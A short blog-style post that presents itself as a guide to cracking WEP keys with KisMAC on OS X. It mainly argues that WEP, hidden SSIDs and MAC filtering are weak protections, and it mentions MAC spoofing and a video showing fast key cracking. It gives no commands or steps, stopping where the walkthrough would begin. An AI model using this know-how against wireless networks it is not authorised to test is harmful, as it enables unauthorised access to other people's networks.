How to crack a 128 bit WEP key using OS X and KISMAC

WEP is one of the ways through which users try to implement encryption on their wireless networks. Most students going into their college dorms for the first time, go the nearest Circuit City or Best Buy, get the latest wireless router and plug it in. Either they leave it open or they go with the default WEP key. Some tech savvy users still go with WEP as their Wireless encryption protocol, just because their laptops might be couple of years old and their wireless adapters might not support better wireless security protocols like WPA or WPA2+TKIP/ WPA+AES.

Even if you use WPA, it doesn’t matter if you have SSID turned on or off, because better cracking programs are coming out every day with better dictionaries. Some help can be obtained through the good folks at GRC where they have a free strong pass phrase generation tool. While MAC address filtering would be an okay complement to your wireless protection, they do not complement your security by much. MAC addresses are actually not encrypted when sent over the air, since they are the only reliable way of identifying a peer. Getting them from network traffic is trivial and only needs a couple of frames. Also, MAC addresses are also trivial to spoof.

To show all you folks why WEP does not provide any security, check out this video from Shawn Hogan. Shawn here cracks two 128 bit WEP keys in around 60 seconds. He uses a publicly available tool called KISMAC available for a Macintosh. After doing some reading, an “ultra-secure” password/MD5 seed would be relatively useless anyway… all it would do is force the attacker to spend 10 minutes on it instead of 10 seconds (see this FAQ and this FAQ), all of which is easily done from the kismac Network menu. It doesn’t even matter if you setup your wireless network to be public or not, because kismac can see it even if the base station isn’t showing the SSID publicly. So here goes hacking with KISMAC on OS X